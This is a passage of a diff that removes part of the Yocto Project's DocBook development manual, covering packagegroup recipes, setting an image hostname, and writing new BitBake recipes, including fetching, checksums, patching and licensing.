-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'>PACKAGES</ulink></filename>
-                variable lists the package group packages to produce.
-                The <filename>inherit packagegroup</filename> statement
-                sets appropriate default values and automatically adds
-                <filename>-dev</filename>, <filename>-dbg</filename>, and
-                <filename>-ptest</filename> complementary packages for each
-                package specified in the <filename>PACKAGES</filename>
-                statement.
-                <note>
-                    The <filename>inherit packagegroup</filename> line should be
-                    located near the top of the recipe, certainly before
-                    the <filename>PACKAGES</filename> statement.
-                </note>
-            </para>
-
-            <para>
-                For each package you specify in <filename>PACKAGES</filename>,
-                you can use
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'>RDEPENDS</ulink></filename>
-                and
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'>RRECOMMENDS</ulink></filename>
-                entries to provide a list of packages the parent task package
-                should contain.
-                You can see examples of these further down in the
-                <filename>packagegroup-base.bb</filename> recipe.
-            </para>
-
-            <para>
-                Here is a short, fabricated example showing the same basic
-                pieces for a hypothetical packagegroup defined in
-                <filename>packagegroup-custom.bb</filename>, where the
-                variable <filename>PN</filename> is the standard way to
-                abbreviate the reference to the full packagegroup name
-                <filename>packagegroup-custom</filename>:
-                <literallayout class='monospaced'>
-     DESCRIPTION = "My Custom Package Groups"
-
-     inherit packagegroup
-
-     PACKAGES = "\
-         ${PN}-apps \
-         ${PN}-tools \
-         "
-
-     RDEPENDS_${PN}-apps = "\
-         dropbear \
-         portmap \
-         psplash"
-
-     RDEPENDS_${PN}-tools = "\
-         oprofile \
-         oprofileui-server \
-         lttng-tools"
-
-     RRECOMMENDS_${PN}-tools = "\
-         kernel-module-oprofile"
-                </literallayout>
-            </para>
-
-            <para>
-                In the previous example, two package group packages are created with their dependencies and their
-                recommended package dependencies listed: <filename>packagegroup-custom-apps</filename>, and
-                <filename>packagegroup-custom-tools</filename>.
-                To build an image using these package group packages, you need to add
-                <filename>packagegroup-custom-apps</filename> and/or
-                <filename>packagegroup-custom-tools</filename> to
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'>IMAGE_INSTALL</ulink></filename>.
-                For other forms of image dependencies see the other areas of this section.
-            </para>
-        </section>
-
-        <section id='usingpoky-extend-customimage-image-name'>
-            <title>Customizing an Image Hostname</title>
-
-            <para>
-                By default, the configured hostname (i.e.
-                <filename>/etc/hostname</filename>) in an image is the
-                same as the machine name.
-                For example, if
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                equals "qemux86", the configured hostname written to
-                <filename>/etc/hostname</filename> is "qemux86".
-            </para>
-
-            <para>
-                You can customize this name by altering the value of the
-                "hostname" variable in the
-                <filename>base-files</filename> recipe using either
-                an append file or a configuration file.
-                Use the following in an append file:
-                <literallayout class='monospaced'>
-     hostname="myhostname"
-                </literallayout>
-                Use the following in a configuration file:
-                <literallayout class='monospaced'>
-     hostname_pn-base-files = "myhostname"
-                </literallayout>
-            </para>
-
-            <para>
-                Changing the default value of the variable "hostname" can be
-                useful in certain situations.
-                For example, suppose you need to do extensive testing on an
-                image and you would like to easily identify the image
-                under test from existing images with typical default
-                hostnames.
-                In this situation, you could change the default hostname to
-                "testme", which results in all the images using the name
-                "testme".
-                Once testing is complete and you do not need to rebuild the
-                image for test any longer, you can easily reset the default
-                hostname.
-            </para>
-
-            <para>
-                Another point of interest is that if you unset the variable,
-                the image will have no default hostname in the filesystem.
-                Here is an example that unsets the variable in a
-                configuration file:
-                <literallayout class='monospaced'>
-     hostname_pn-base-files = ""
-                </literallayout>
-                Having no default hostname in the filesystem is suitable for
-                environments that use dynamic hostnames such as virtual
-                machines.
-            </para>
-        </section>
-    </section>
-
-    <section id='new-recipe-writing-a-new-recipe'>
-        <title>Writing a New Recipe</title>
-
-        <para>
-            Recipes (<filename>.bb</filename> files) are fundamental components
-            in the Yocto Project environment.
-            Each software component built by the OpenEmbedded build system
-            requires a recipe to define the component.
-            This section describes how to create, write, and test a new
-            recipe.
-            <note>
-                For information on variables that are useful for recipes and
-                for information about recipe naming issues, see the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-varlocality-recipe-required'>Required</ulink>"
-                section of the Yocto Project Reference Manual.
-            </note>
-        </para>
-
-        <section id='new-recipe-overview'>
-            <title>Overview</title>
-
-            <para>
-                The following figure shows the basic process for creating a
-                new recipe.
-                The remainder of the section provides details for the steps.
-                <imagedata fileref="figures/recipe-workflow.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-        </section>
-
-        <section id='new-recipe-locate-or-automatically-create-a-base-recipe'>
-            <title>Locate or Automatically Create a Base Recipe</title>
-
-            <para>
-                You can always write a recipe from scratch.
-                However, three choices exist that can help you quickly get a
-                start on a new recipe:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis><filename>devtool add</filename>:</emphasis>
-                        A command that assists in creating a recipe and
-                        an environment conducive to development.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>recipetool create</filename>:</emphasis>
-                        A command provided by the Yocto Project that automates
-                        creation of a base recipe based on the source
-                        files.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Existing Recipes:</emphasis>
-                        Location and modification of an existing recipe that is
-                        similar in function to the recipe you need.
-                        </para></listitem>
-                </itemizedlist>
-                <note>
-                    For information on recipe syntax, see the
-                    "<link linkend='recipe-syntax'>Recipe Syntax</link>"
-                    section.
-                </note>
-            </para>
-
-            <section id='new-recipe-creating-the-base-recipe-using-devtool'>
-                <title>Creating the Base Recipe Using <filename>devtool add</filename></title>
-
-                <para>
-                    The <filename>devtool add</filename> command uses the same
-                    logic for auto-creating the recipe as
-                    <filename>recipetool create</filename>, which is listed
-                    below.
-                    Additionally, however, <filename>devtool add</filename>
-                    sets up an environment that makes it easy for you to
-                    patch the source and to make changes to the recipe as
-                    is often necessary when adding a recipe to build a new
-                    piece of software to be included in a build.
-                </para>
-
-                <para>
-                    You can find a complete description of the
-                    <filename>devtool add</filename> command in the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-a-closer-look-at-devtool-add'>A Closer Look at <filename>devtool</filename> add</ulink>"
-                    section in the Yocto Project Application Development
-                    and the Extensible Software Development Kit (eSDK) manual.
-                </para>
-            </section>
-
-            <section id='new-recipe-creating-the-base-recipe-using-recipetool'>
-                <title>Creating the Base Recipe Using <filename>recipetool create</filename></title>
-
-                <para>
-                    <filename>recipetool create</filename> automates creation
-                    of a base recipe given a set of source code files.
-                    As long as you can extract or point to the source files,
-                    the tool will construct a recipe and automatically
-                    configure all pre-build information into the recipe.
-                    For example, suppose you have an application that builds
-                    using Autotools.
-                    Creating the base recipe using
-                    <filename>recipetool</filename> results in a recipe
-                    that has the pre-build dependencies, license requirements,
-                    and checksums configured.
-                </para>
-
-                <para>
-                    To run the tool, you just need to be in your
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                    and have sourced the build environment setup script
-                    (i.e.
-                    <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>oe-init-build-env</filename></ulink>).
-                    To get help on the tool, use the following command:
-                    <literallayout class='monospaced'>
-     $ recipetool -h
-     NOTE: Starting bitbake server...
-     usage: recipetool [-d] [-q] [--color COLOR] [-h] &lt;subcommand&gt; ...
-
-     OpenEmbedded recipe tool
-
-     options:
-       -d, --debug     Enable debug output
-       -q, --quiet     Print only errors
-       --color COLOR   Colorize output (where COLOR is auto, always, never)
-       -h, --help      show this help message and exit
-
-     subcommands:
-       create          Create a new recipe
-       newappend       Create a bbappend for the specified target in the specified
-                       layer
-       setvar          Set a variable within a recipe
-       appendfile      Create/update a bbappend to replace a target file
-       appendsrcfiles  Create/update a bbappend to add or replace source files
-       appendsrcfile   Create/update a bbappend to add or replace a source file
-     Use recipetool &lt;subcommand&gt; --help to get help on a specific command
-                    </literallayout>
-                </para>
-
-                <para>
-                    Running
-                    <filename>recipetool create -o</filename>&nbsp;<replaceable>OUTFILE</replaceable>
-                    creates the base recipe and locates it properly in the
-                    layer that contains your source files.
-                    Following are some syntax examples:
-                </para>
-
-                <para>
-                    Use this syntax to generate a recipe based on
-                    <replaceable>source</replaceable>.
-                    Once generated, the recipe resides in the existing source
-                    code layer:
-                    <literallayout class='monospaced'>
-     recipetool create -o <replaceable>OUTFILE</replaceable>&nbsp;<replaceable>source</replaceable>
-                    </literallayout>
-                    Use this syntax to generate a recipe using code that you
-                    extract from <replaceable>source</replaceable>.
-                    The extracted code is placed in its own layer defined
-                    by <replaceable>EXTERNALSRC</replaceable>.
-                    <literallayout class='monospaced'>
-     recipetool create -o <replaceable>OUTFILE</replaceable> -x <replaceable>EXTERNALSRC</replaceable> <replaceable>source</replaceable>
-                    </literallayout>
-                    Use this syntax to generate a recipe based on
-                    <replaceable>source</replaceable>.
-                    The options direct <filename>recipetool</filename> to
-                    generate debugging information.
-                    Once generated, the recipe resides in the existing source
-                    code layer:
-                    <literallayout class='monospaced'>
-     recipetool create -d -o <replaceable>OUTFILE</replaceable> <replaceable>source</replaceable>
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='new-recipe-locating-and-using-a-similar-recipe'>
-                <title>Locating and Using a Similar Recipe</title>
-
-                <para>
-                    Before writing a recipe from scratch, it is often useful to
-                    discover whether someone else has already written one that
-                    meets (or comes close to meeting) your needs.
-                    The Yocto Project and OpenEmbedded communities maintain many
-                    recipes that might be candidates for what you are doing.
-                    You can find a good central index of these recipes in the
-                    <ulink url='http://layers.openembedded.org'>OpenEmbedded Layer Index</ulink>.
-                </para>
-
-                <para>
-                    Working from an existing recipe or a skeleton recipe is the
-                    best way to get started.
-                    Here are some points on both methods:
-                    <itemizedlist>
-                        <listitem><para><emphasis>Locate and modify a recipe that
-                            is close to what you want to do:</emphasis>
-                            This method works when you are familiar with the
-                            current recipe space.
-                            The method does not work so well for those new to
-                            the Yocto Project or writing recipes.</para>
-                            <para>Some risks associated with this method are
-                            using a recipe that has areas totally unrelated to
-                            what you are trying to accomplish with your recipe,
-                            not recognizing areas of the recipe that you might
-                            have to add from scratch, and so forth.
-                            All these risks stem from unfamiliarity with the
-                            existing recipe space.</para></listitem>
-                        <listitem><para><emphasis>Use and modify the following
-                            skeleton recipe:</emphasis>
-                            If for some reason you do not want to use
-                            <filename>recipetool</filename> and you cannot
-                            find an existing recipe that is close to meeting
-                            your needs, you can use the following structure to
-                            provide the fundamental areas of a new recipe.
-                            <literallayout class='monospaced'>
-     DESCRIPTION = ""
-     HOMEPAGE = ""
-     LICENSE = ""
-     SECTION = ""
-     DEPENDS = ""
-     LIC_FILES_CHKSUM = ""
-
-     SRC_URI = ""
-                            </literallayout>
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-        </section>
-
-        <section id='new-recipe-storing-and-naming-the-recipe'>
-            <title>Storing and Naming the Recipe</title>
-
-            <para>
-                Once you have your base recipe, you should put it in your
-                own layer and name it appropriately.
-                Locating it correctly ensures that the OpenEmbedded build
-                system can find it when you use BitBake to process the
-                recipe.
-            </para>
-
-            <itemizedlist>
-                <listitem><para><emphasis>Storing Your Recipe:</emphasis>
-                    The OpenEmbedded build system locates your recipe
-                    through the layer's <filename>conf/layer.conf</filename>
-                    file and the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILES'><filename>BBFILES</filename></ulink>
-                    variable.
-                    This variable sets up a path from which the build system can
-                    locate recipes.
-                    Here is the typical use:
-                    <literallayout class='monospaced'>
-     BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
-                 ${LAYERDIR}/recipes-*/*/*.bbappend"
-                    </literallayout>
-                    Consequently, you need to be sure you locate your new recipe
-                    inside your layer such that it can be found.</para>
-                    <para>You can find more information on how layers are
-                    structured in the
-                    "<link linkend='understanding-and-creating-layers'>Understanding and Creating Layers</link>"
-                    section.</para></listitem>
-                <listitem><para><emphasis>Naming Your Recipe:</emphasis>
-                    When you name your recipe, you need to follow this naming
-                    convention:
-                    <literallayout class='monospaced'>
-     <replaceable>basename</replaceable>_<replaceable>version</replaceable>.bb
-                    </literallayout>
-                    Use lower-cased characters and do not include the reserved
-                    suffixes <filename>-native</filename>,
-                    <filename>-cross</filename>, <filename>-initial</filename>,
-                    or <filename>-dev</filename> casually (i.e. do not use them
-                    as part of your recipe name unless the string applies).
-                    Here are some examples:
-                    <literallayout class='monospaced'>
-     cups_1.7.0.bb
-     gawk_4.0.2.bb
-     irssi_0.8.16-rc1.bb
-                    </literallayout></para></listitem>
-            </itemizedlist>
-        </section>
-
-        <section id='new-recipe-running-a-build-on-the-recipe'>
-            <title>Running a Build on the Recipe</title>
-
-            <para>
-                Creating a new recipe is usually an iterative process that
-                requires using BitBake to process the recipe multiple times in
-                order to progressively discover and add information to the
-                recipe file.
-            </para>
-
-            <para>
-                Assuming you have sourced the build environment setup script (i.e.
-                <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>)
-                and you are in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-                use BitBake to process your recipe.
-                All you need to provide is the
-                <filename><replaceable>basename</replaceable></filename> of the recipe as described
-                in the previous section:
-                <literallayout class='monospaced'>
-     $ bitbake <replaceable>basename</replaceable>
-                </literallayout>
-
-            </para>
-
-            <para>
-                During the build, the OpenEmbedded build system creates a
-                temporary work directory for each recipe
-                (<filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}</filename>)
-                where it keeps extracted source files, log files, intermediate
-                compilation and packaging files, and so forth.
-            </para>
-
-            <para>
-                The path to the per-recipe temporary work directory depends
-                on the context in which it is being built.
-                The quickest way to find this path is to have BitBake return it
-                by running the following:
-                <literallayout class='monospaced'>
-     $ bitbake -e <replaceable>basename</replaceable> | grep ^WORKDIR=
-                </literallayout>
-                As an example, assume a Source Directory top-level folder named
-                <filename>poky</filename>, a default Build Directory at
-                <filename>poky/build</filename>, and a
-                <filename>qemux86-poky-linux</filename> machine target system.
-                Furthermore, suppose your recipe is named
-                <filename>foo_1.3.0.bb</filename>.
-                In this case, the work directory the build system uses to
-                build the package would be as follows:
-                <literallayout class='monospaced'>
-     poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
-                </literallayout>
-                Inside this directory you can find sub-directories such as
-                <filename>image</filename>, <filename>packages-split</filename>,
-                and <filename>temp</filename>.
-                After the build, you can examine these to determine how well
-                the build went.
-                <note>
-                    You can find log files for each task in the recipe's
-                    <filename>temp</filename> directory (e.g.
-                    <filename>poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0/temp</filename>).
-                    Log files are named <filename>log.<replaceable>taskname</replaceable></filename>
-                    (e.g. <filename>log.do_configure</filename>,
-                    <filename>log.do_fetch</filename>, and
-                    <filename>log.do_compile</filename>).
-                </note>
-            </para>
-
-            <para>
-                You can find more information about the build process in
-                "<ulink url='&YOCTO_DOCS_OM_URL;#overview-development-environment'>The Yocto Project Development Environment</ulink>"
-                chapter of the Yocto Project Overview and Concepts Manual.
-            </para>
-        </section>
-
-        <section id='new-recipe-fetching-code'>
-            <title>Fetching Code</title>
-
-            <para>
-                The first thing your recipe must do is specify how to fetch
-                the source files.
-                Fetching is controlled mainly through the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                variable.
-                Your recipe must have a <filename>SRC_URI</filename> variable
-                that points to where the source is located.
-                For a graphical representation of source locations, see the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#sources-dev-environment'>Sources</ulink>"
-                section in the Yocto Project Overview and Concepts Manual.
-            </para>
-
-            <para>
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>
-                task uses the prefix of each entry in the
-                <filename>SRC_URI</filename> variable value to determine which
-                <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetcher</ulink>
-                to use to get your source files.
-                It is the <filename>SRC_URI</filename> variable that triggers
-                the fetcher.
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
-                task uses the variable after source is fetched to apply
-                patches.
-                The OpenEmbedded build system uses
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESOVERRIDES'><filename>FILESOVERRIDES</filename></ulink>
-                for scanning directory locations for local files in
-                <filename>SRC_URI</filename>.
-            </para>
-
-            <para>
-                The <filename>SRC_URI</filename> variable in your recipe must
-                define each unique location for your source files.
-                It is good practice to not hard-code version numbers in a URL used
-                in <filename>SRC_URI</filename>.
-                Rather than hard-code these values, use
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink><filename>}</filename>,
-                which causes the fetch process to use the version specified in
-                the recipe filename.
-                Specifying the version in this manner means that upgrading the
-                recipe to a future version is as simple as renaming the recipe
-                to match the new version.
-            </para>
-
-            <para>
-                Here is a simple example from the
-                <filename>meta/recipes-devtools/strace/strace_5.5.bb</filename>
-                recipe where the source comes from a single tarball.
-                Notice the use of the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
-                variable:
-                <literallayout class='monospaced'>
-     SRC_URI = "https://strace.io/files/${PV}/strace-${PV}.tar.xz \
-                </literallayout>
-            </para>
-
-            <para>
-                Files mentioned in <filename>SRC_URI</filename> whose names end
-                in a typical archive extension (e.g. <filename>.tar</filename>,
-                <filename>.tar.gz</filename>, <filename>.tar.bz2</filename>,
-                <filename>.zip</filename>, and so forth), are automatically
-                extracted during the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>
-                task.
-                For another example that specifies these types of files, see
-                the
-                "<link linkend='new-recipe-autotooled-package'>Autotooled Package</link>"
-                section.
-            </para>
-
-            <para>
-                Another way of specifying source is from an SCM.
-                For Git repositories, you must specify
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
-                and you should specify
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
-                to include the revision with
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCPV'><filename>SRCPV</filename></ulink>.
-                Here is an example from the recipe
-                <filename>meta/recipes-kernel/blktrace/blktrace_git.bb</filename>:
-                <literallayout class='monospaced'>
-     SRCREV = "d6918c8832793b4205ed3bfede78c2f915c23385"
-
-     PR = "r6"
-     PV = "1.0.5+git${SRCPV}"
-
-     SRC_URI = "git://git.kernel.dk/blktrace.git \
-                file://ldflags.patch"
-                </literallayout>
-            </para>
-
-            <para>
-                If your <filename>SRC_URI</filename> statement includes
-                URLs pointing to individual files fetched from a remote server
-                other than a version control system, BitBake attempts to
-                verify the files against checksums defined in your recipe to
-                ensure they have not been tampered with or otherwise modified
-                since the recipe was written.
-                Two checksums are used:
-                <filename>SRC_URI[md5sum]</filename> and
-                <filename>SRC_URI[sha256sum]</filename>.
-            </para>
-
-            <para>
-                If your <filename>SRC_URI</filename> variable points to
-                more than a single URL (excluding SCM URLs), you need to
-                provide the <filename>md5</filename> and
-                <filename>sha256</filename> checksums for each URL.
-                For these cases, you provide a name for each URL as part of
-                the <filename>SRC_URI</filename> and then reference that name
-                in the subsequent checksum statements.
-                Here is an example combining lines from the files
-                <filename>git.inc</filename> and
-                <filename>git_2.24.1.bb</filename>:
-                <literallayout class='monospaced'>
-     SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
-                ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
-
-     SRC_URI[tarball.md5sum] = "166bde96adbbc11c8843d4f8f4f9811b"
-     SRC_URI[tarball.sha256sum] = "ad5334956301c86841eb1e5b1bb20884a6bad89a10a6762c958220c7cf64da02"
-     SRC_URI[manpages.md5sum] = "31c2272a8979022497ba3d4202df145d"
-     SRC_URI[manpages.sha256sum] = "9a7ae3a093bea39770eb96ca3e5b40bff7af0b9f6123f089d7821d0e5b8e1230"
-                </literallayout>
-            </para>
-
-            <para>
-                Proper values for <filename>md5</filename> and
-                <filename>sha256</filename> checksums might be available
-                with other signatures on the download page for the upstream
-                source (e.g. <filename>md5</filename>,
-                <filename>sha1</filename>, <filename>sha256</filename>,
-                <filename>GPG</filename>, and so forth).
-                Because the OpenEmbedded build system only deals with
-                <filename>sha256sum</filename> and <filename>md5sum</filename>,
-                you should verify all the signatures you find by hand.
-            </para>
-
-            <para>
-                If no <filename>SRC_URI</filename> checksums are specified
-                when you attempt to build the recipe, or you provide an
-                incorrect checksum, the build will produce an error for each
-                missing or incorrect checksum.
-                As part of the error message, the build system provides
-                the checksum string corresponding to the fetched file.
-                Once you have the correct checksums, you can copy and paste
-                them into your recipe and then run the build again to continue.
-                <note>
-                    As mentioned, if the upstream source provides signatures
-                    for verifying the downloaded source code, you should
-                    verify those manually before setting the checksum values
-                    in the recipe and continuing with the build.
-                </note>
-            </para>
-
-            <para>
-                This final example is a bit more complicated and is from the
-                <filename>meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.20.bb</filename>
-                recipe.
-                The example's <filename>SRC_URI</filename> statement identifies
-                multiple files as the source files for the recipe: a tarball, a
-                patch file, a desktop file, and an icon.
-                <literallayout class='monospaced'>
-     SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
-                file://xwc.patch \
-                file://rxvt.desktop \
-                file://rxvt.png"
-                </literallayout>
-            </para>
-
-            <para>
-                When you specify local files using the
-                <filename>file://</filename> URI protocol, the build system
-                fetches files from the local machine.
-                The path is relative to the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
-                variable and searches specific directories in a certain order:
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-BP'><filename>BP</filename></ulink><filename>}</filename>,
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-BPN'><filename>BPN</filename></ulink><filename>}</filename>,
-                and <filename>files</filename>.
-                The directories are assumed to be subdirectories of the
-                directory in which the recipe or append file resides.
-                For another example that specifies these types of files, see the
-                "<link linkend='new-recipe-single-c-file-package-hello-world'>Single .c File Package (Hello World!)</link>"
-                section.
-            </para>
-
-            <para>
-                The previous example also specifies a patch file.
-                Patch files are files whose names usually end in
-                <filename>.patch</filename> or <filename>.diff</filename> but
-                can end with compressed suffixes such as
-                <filename>diff.gz</filename> and
-                <filename>patch.bz2</filename>, for example.
-                The build system automatically applies patches as described
-                in the
-                "<link linkend='new-recipe-patching-code'>Patching Code</link>" section.
-            </para>
-        </section>
-
-        <section id='new-recipe-unpacking-code'>
-            <title>Unpacking Code</title>
-
-            <para>
-                During the build, the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>
-                task unpacks the source with
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink><filename>}</filename>
-                pointing to where it is unpacked.
-            </para>
-
-            <para>
-                If you are fetching your source files from an upstream source
-                archived tarball and the tarball's internal structure matches
-                the common convention of a top-level subdirectory named
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-BPN'><filename>BPN</filename></ulink><filename>}-${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink><filename>}</filename>,
-                then you do not need to set <filename>S</filename>.
-                However, if <filename>SRC_URI</filename> specifies to fetch
-                source from an archive that does not use this convention,
-                or from an SCM like Git or Subversion, your recipe needs to
-                define <filename>S</filename>.
-            </para>
-
-            <para>
-                If processing your recipe using BitBake successfully unpacks
-                the source files, you need to be sure that the directory
-                pointed to by <filename>${S}</filename> matches the structure
-                of the source.
-            </para>
-        </section>
-
-        <section id='new-recipe-patching-code'>
-            <title>Patching Code</title>
-
-            <para>
-                Sometimes it is necessary to patch code after it has been
-                fetched.
-                Any files mentioned in <filename>SRC_URI</filename> whose
-                names end in <filename>.patch</filename> or
-                <filename>.diff</filename> or compressed versions of these
-                suffixes (e.g. <filename>diff.gz</filename> are treated as
-                patches.
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
-                task automatically applies these patches.
-            </para>
-
-            <para>
-                The build system should be able to apply patches with the "-p1"
-                option (i.e. one directory level in the path will be stripped
-                off).
-                If your patch needs to have more directory levels stripped off,
-                specify the number of levels using the "striplevel" option in
-                the <filename>SRC_URI</filename> entry for the patch.
-                Alternatively, if your patch needs to be applied in a specific
-                subdirectory that is not specified in the patch file, use the
-                "patchdir" option in the entry.
-            </para>
-
-            <para>
-                As with all local files referenced in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                using <filename>file://</filename>, you should place
-                patch files in a directory next to the recipe either
-                named the same as the base name of the recipe
-                (<ulink url='&YOCTO_DOCS_REF_URL;#var-BP'><filename>BP</filename></ulink>
-                and
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BPN'><filename>BPN</filename></ulink>)
-                or "files".
-            </para>
-        </section>
-
-        <section id='new-recipe-licensing'>
-            <title>Licensing</title>
-
-            <para>
-                Your recipe needs to have both the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
-                and
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
-                variables:
-                <itemizedlist>
-                    <listitem><para><emphasis><filename>LICENSE</filename>:</emphasis>
-                        This variable specifies the license for the software.
-                        If you do not know the license under which the software
-                        you are building is distributed, you should go to the
-                        source code and look for that information.
-                        Typical files containing this information include
-                        <filename>COPYING</filename>,
-                        <filename>LICENSE</filename>, and
-                        <filename>README</filename> files.
-                        You could also find the information near the top of
-                        a source file.
-                        For example, given a piece of software licensed under
-                        the GNU General Public License version 2, you would
-                        set <filename>LICENSE</filename> as follows:
-                        <literallayout class='monospaced'>
-     LICENSE = "GPLv2"
-                        </literallayout></para>
-                        <para>The licenses you specify within
-                        <filename>LICENSE</filename> can have any name as long
-                        as you do not use spaces, since spaces are used as
-                        separators between license names.
-                        For standard licenses, use the names of the files in
-                        <filename>meta/files/common-licenses/</filename>
-                        or the <filename>SPDXLICENSEMAP</filename> flag names
-                        defined in <filename>meta/conf/licenses.conf</filename>.
-                        </para></listitem>
-                    <listitem><para><emphasis><filename>LIC_FILES_CHKSUM</filename>:</emphasis>
-                        The OpenEmbedded build system uses this variable to
-                        make sure the license text has not changed.
-                        If it has, the build produces an error and it affords
-                        you the chance to figure it out and correct the problem.
-                        </para>
-                        <para>You need to specify all applicable licensing
-                        files for the software.
-                        At the end of the configuration step, the build process
-                        will compare the checksums of the files to be sure
-                        the text has not changed.
-                        Any differences result in an error with the message
-                        containing the current checksum.
-                        For more explanation and examples of how to set the
-                        <filename>LIC_FILES_CHKSUM</filename> variable, see the
-                        "<link link='usingpoky-configuring-LIC_FILES_CHKSUM'>Tracking License Changes</link>"
-                        section.</para>
-
-                        <para>To determine the correct checksum string, you
-                        can list the appropriate files in the
-                        <filename>LIC_FILES_CHKSUM</filename> variable with
-                        incorrect md5 strings, attempt to build the software,
-                        and then note the resulting error messages that will
-                        report the correct md5 strings.
-                        See the
-                        "<link linkend='new-recipe-fetching-code'>Fetching Code</link>"
-                        section for additional information.
-                    </para>
-
-                    <para>
-                        Here is an example that assumes the software has a
-                        <filename>COPYING</filename> file:
-                        <literallayout class='monospaced'>
-     LIC_FILES_CHKSUM = "file://COPYING;md5=xxx"
-                        </literallayout>
-                        When you try to build the software, the build system
-                        will produce an error and give you the correct string
-                        that you can substitute into the recipe file for a
-                        subsequent build.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-<!--
-
-            <para>
-                For trying this out I created a new recipe named
-                <filename>htop_1.0.2.bb</filename> and put it in
-                <filename>poky/meta/recipes-extended/htop</filename>.
-                There are two license type statements in my very simple
-                recipe:
-                <literallayout class='monospaced'>
-     LICENSE = ""
-
-     LIC_FILES_CHKSUM = ""
-
-     SRC_URI[md5sum] = ""
-     SRC_URI[sha256sum] = ""
-                </literallayout>
-                Evidently, you need to run a <filename>bitbake -c cleanall htop</filename>.
-                Next, you delete or comment out the two <filename>SRC_URI</filename>
-                lines at the end and then attempt to build the software with
-                <filename>bitbake htop</filename>.
-                Doing so causes BitBake to report some errors and and give
-                you the actual strings you need for the last two
-                <filename>SRC_URI</filename> lines.
-                Prior to this, you have to dig around in the home page of the
-                source for <filename>htop</filename> and determine that the
-                software is released under GPLv2.
-                You can provide that in the <filename>LICENSE</filename>
-                statement.
-                Now you edit your recipe to have those two strings for
-                the <filename>SRC_URI</filename> statements:
-                <literallayout class='monospaced'>
-     LICENSE = "GPLv2"
-
-     LIC_FILES_CHKSUM = ""
-
-     SRC_URI = "${SOURCEFORGE_MIRROR}/htop/htop-${PV}.tar.gz"
-     SRC_URI[md5sum] = "0d01cca8df3349c74569cefebbd9919e"
-     SRC_URI[sha256sum] = "ee60657b044ece0df096c053060df7abf3cce3a568ab34d260049e6a37ccd8a1"
-                </literallayout>
-                At this point, you can build the software again using the
-                <filename>bitbake htop</filename> command.
-                There is just a set of errors now associated with the
-                empty <filename>LIC_FILES_CHKSUM</filename> variable now.
-            </para>
--->
-
-        </section>
-
-        <section id='new-dependencies'>
-            <title>Dependencies</title>
-
-            <para>
-                Most software packages have a short list of other packages
-                that they require, which are called dependencies.
